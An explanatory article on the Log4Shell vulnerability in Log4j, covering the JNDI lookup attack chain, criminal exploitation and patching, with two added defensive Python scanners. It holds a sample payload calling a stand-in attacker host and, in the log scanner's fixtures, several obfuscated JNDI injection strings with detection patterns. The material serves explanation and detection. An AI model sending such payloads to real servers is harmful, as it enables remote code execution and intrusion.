The Log4J security breach – the whole story!

One of the most dangerous security vulnerabilities since the internet has existed

Log4Shell (CVE-2021-44228) is the name of a vulnerability in the widely used Log4J logging library. The vulnerable code had been part of Log4j 2 since 2013 but went unnoticed for years. On 24 November 2021 the issue was discovered and reported to Apache by the Alibaba Cloud Security team. It became public on 9 December 2021, and on the same day attacks were confirmed against servers of the game “Minecraft”.

Log4Shell lets an attacker execute program code of his own choosing on the target system, which fully compromises the attacked system. Attackers can leak data from servers or run arbitrary commands, spy out internal networks or change data on the server.

How does the security gap work?

Log4J is more complex than a black box that records what a program does. Data coming from outside (HTTP headers, user names, chat messages) is not simply written to a log file: before a message is written, Log4J scans it for lookup expressions of the form ${prefix:key} and replaces them with their value, and this is exactly where the problem lies. One of these prefixes is “jndi”. JNDI stands for “Java Naming and Directory Interface”; it is the Java API through which programs access naming and directory services such as LDAP or RMI. A JNDI lookup follows references to remote computers, and older Java versions will even load program code from a location named in such a reference. This is highly dangerous, because anyone who can get a string logged can use this gap to make the server contact a machine under his control.

This means: Log4Shell can reach the entire system and is triggered as soon as Log4J logs data from outside that contains a JNDI lookup:

  1. An attacker transmits data such as ${jndi:ldap://attacker.example/a} to the server he wants to attack, for example in an HTTP header, a user name or a chat message
  2. Log4J records the data in a log file and, while formatting the message, recognises and evaluates the lookup
  3. Because the lookup names JNDI, Log4J sends a request to the attacker’s LDAP or RMI server
  4. The attacker’s server responds with a reference to malicious code hosted on the attacker’s machine
  5. The attacked server loads and executes that code, and the attacker gains access
  6. The data does not have to be logged immediately: a payload can “rest” in a database field or a stored message and is activated only when another component logs it later
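Step 1 of this chain leaves a trace in the logs of the attacked server, and that is where incident responders first looked for it. The following scanner is added here as an example (Python, not code from the original article or from the Log4j project): it runs an obfuscation-aware check over web server access log lines. The log lines are constructed for this example and the addresses and host names in them (203.0.113.x, canary.example) are placeholders. The normalisation handles URL encoding and the nested ${lower:...}, ${upper:...} and ${env:X:-y} lookups that real attackers used to hide the string “jndi” from simple pattern matching, and it reports the callback host so that it can be blocked and hunted for.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed web server access log lines (placeholder addresses, not real traffic).
SAMPLE_LOGS = [
    # 0: plain payload in the User-Agent field
    '203.0.113.10 - - [10/Dec/2021:02:15:41 +0000] "GET / HTTP/1.1" 200 1043 "-" '
    '"${jndi:ldap://203.0.113.66:1389/Exploit}"',
    # 1: benign request
    '198.51.100.7 - - [10/Dec/2021:02:15:42 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0"',
    # 2: nested lower/upper lookups hide the literal string "jndi"
    '203.0.113.11 - - [10/Dec/2021:02:16:03 +0000] "GET /api/v1/users HTTP/1.1" 404 0 "-" '
    '"${${lower:j}${upper:n}di:${lower:r}mi://203.0.113.66/obj}"',
    # 3: undefined-variable default trick, URL-encoded inside the request path
    '203.0.113.12 - - [10/Dec/2021:02:16:20 +0000] "GET /%24%7B%24%7Benv%3ANaN%3A-j%7Dndi'
    '%3Adns%3A%2F%2Fcanary.example%2Fprobe%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
]

# Log4j 2.x substitutes ${lower:x} -> x in lower case, ${upper:x} -> x in upper
# case and ${env:UNDEFINED:-x} (or ${::-x}) -> the default value x. Attackers
# nest these so that "jndi" never appears literally in the raw request.
_LOWER = re.compile(r"\$\{\s*lower\s*:([^{}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{\s*upper\s*:([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The resolved form: ${jndi:<scheme>://<host>...}. The lookup prefix is
# case-insensitive in Log4j, so the regex is too.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:\s}]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Peel off URL encoding and the innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def scan_line(line: str) -> Optional[dict]:
    """Return details of a JNDI lookup in one log line, or None if there is none."""
    normalized = normalize(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),   # ldap, rmi, dns, ...
        "host": m.group(2),             # the callback server to block and hunt for
        "obfuscated": "${jndi:" not in line.lower(),
        "normalized": normalized,
    }


def scan_logs(lines: List[str]) -> List[dict]:
    """Scan many lines; each finding carries the index of the line it came from."""
    findings = []
    for idx, line in enumerate(lines):
        hit = scan_line(line)
        if hit:
            hit["line"] = idx
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['scheme']}://{f['host']} obfuscated={f['obfuscated']}")
```

A finding with scheme “dns” and a host you do not own is usually a scanner or a canary probe; a finding with “ldap” or “rmi” against an internal host that was running a vulnerable Log4J is a reason to treat that host as compromised.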

The dangerous business models behind the Log4J breach

Initially, most of the activity consisted of manual test attacks and scans by IT security researchers. Automated attempts to exploit the vulnerability followed within days.

Cybercriminals and intelligence services quickly discovered the gap for their own purposes. Variants of the Mirai botnet, for example, infect vulnerable servers and spread from there automatically. For other groups the Log4J vulnerability serves as initial access to networks: such access can be sold on to people who use it for their own purposes.

What to do?

It is very difficult to determine whether a system has been breached or not. Even finding out which programmes use Log4J is not easy, because the library is usually bundled inside application archives rather than installed on its own. If you are uncertain about a potential breach, take the programme offline until it has been patched or mitigated, and keep its logs for investigation.

CISA’s GitHub repository contains a list of software products and vendors with the status “affected”, “not affected”, “fixed” or “under investigation” and a link to the corresponding vendor security notifications.

For IT managers, the repository gives a good overview of whether vulnerable products are in use in the company.

Manufacturers and developers are also working hard on updates and patches, which should be applied as soon as they are available. 

The JNDI lookup has been deactivated by default since Log4j 2.16.0, and version 2.17.0 of the library has since been released. It closes another high-risk vulnerability (CVE-2021-45105, CVSS 7.5), a denial of service caused by uncontrolled recursion when lookups are evaluated. Where an update is not immediately possible, removing the JndiLookup class from the log4j-core archive is the mitigation recommended by Apache. In any case, administrators and IT managers should not hesitate and should install the current Log4J version quickly.
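Neither the CISA list nor a package manager will tell you about a log4j-core jar bundled inside someone else’s .war, which is the difficulty described in the “What to do?” section above. The following scanner is added here as an example (Python, not code from the original article or from the Apache project) of the file system check an administrator can run: it walks a directory, opens every .jar, .war and .ear, descends into nested archives, reads the Log4j version from log4j-core’s pom.properties, checks whether JndiLookup.class is still present, and classifies each find against the version boundaries named above (2.15.0, 2.17.0). The archives it scans in the demo are constructed fixtures containing only those two entries, not real Log4j builds; the directory layout and file names are assumptions for the example.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import List, Optional, Tuple

# The two archive entries the check relies on. JndiLookup.class is the class
# Apache told users to delete from log4j-core when an update was impossible.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

Version = Optional[Tuple[int, int, int]]


def parse_version(pom_properties: str) -> Version:
    """Read 'version=2.14.1' from pom.properties as a comparable (major, minor, patch)."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties, re.MULTILINE)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify(version: Version, has_jndi_lookup: bool) -> str:
    """Map version and presence of JndiLookup.class to an action for the admin."""
    if version is None:
        return "AFFECTED: JndiLookup.class present, version unknown" if has_jndi_lookup else "unknown"
    if version >= (2, 17, 0):
        return "fixed"
    if version >= (2, 15, 0):
        return "partially fixed: update to 2.17.0 or later"
    if has_jndi_lookup:
        return "AFFECTED by CVE-2021-44228: update now"
    return "mitigated: JndiLookup.class removed, still update"


def scan_archive(data: bytes, label: str, findings: List[dict]) -> None:
    """Inspect one archive held in memory, so nested archives need no temp files."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        has_jndi = JNDI_LOOKUP_CLASS in names
        if POM_PROPERTIES in names:
            version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
            findings.append({"path": label, "version": version, "jndi_lookup": has_jndi,
                             "status": classify(version, has_jndi)})
        elif has_jndi:
            # log4j-core shaded into another jar without its pom.properties
            findings.append({"path": label, "version": None, "jndi_lookup": True,
                             "status": classify(None, True)})
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root: str) -> List[dict]:
    """Walk a directory tree and scan every archive found in it."""
    findings: List[dict] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as f:
                    scan_archive(f.read(), path, findings)
    return findings


def build_demo_tree(root: str) -> None:
    """Constructed fixtures: fake log4j-core jars with only the two entries the scanner reads."""
    def fake_core(version: str, with_jndi: bool = True) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP_CLASS, b"")   # placeholder, no real bytecode
        return buf.getvalue()

    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(fake_core("2.14.1"))
    with open(os.path.join(root, "lib", "log4j-core-2.17.0.jar"), "wb") as f:
        f.write(fake_core("2.17.0"))
    # a web application bundling a mitigated (class removed) copy inside WEB-INF/lib
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.11.2.jar", fake_core("2.11.2", with_jndi=False))
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(war.getvalue())


def demo() -> List[dict]:
    """Build the fixture tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: version={f['version']} status={f['status']}")
```

The version read from pom.properties is only as reliable as the packaging: a log4j-core that was shaded into an application jar may lack it, which is why the presence of JndiLookup.class is reported on its own and treated as affected.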